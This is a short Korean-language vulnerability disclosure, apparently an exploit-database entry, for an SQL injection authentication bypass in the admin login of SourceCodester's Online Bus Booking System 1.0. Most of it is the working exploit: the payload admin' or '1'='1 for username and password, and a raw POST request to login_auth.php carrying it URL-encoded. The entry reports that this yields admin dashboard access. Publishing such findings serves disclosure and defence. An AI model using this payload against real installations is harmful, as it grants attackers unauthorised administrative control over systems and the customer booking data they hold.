
Online Bus Booking System 1.0에는 admin.php의 관리자 로그인 화면에서 사용자 이름 또는 비밀번호 SQL 인젝션을 통한 인증 우회가 존재합니다.
Online Bus Booking System 1.0에는 admin.php의 관리자 로그인 화면에서 username 또는 password SQL 인젝션을 통한 인증 우회(Authentication Bypass) 취약점이 존재합니다.
#공급업체 - SourceCodester
#제품 -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#취약점 유형 - 인증 우회
#영향받는 구성 요소 - bus_booking/admin.php
#공격 유형- 로컬
#권한 상승 - true
#영향 코드 실행 - true
공격 벡터
관리자 로그인 패널로 이동하여 우회를 시도하십시오.
요청 페이로드에서 다음을 설정합니다.
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
관리자 대시보드에 성공적으로 로그인되었습니다.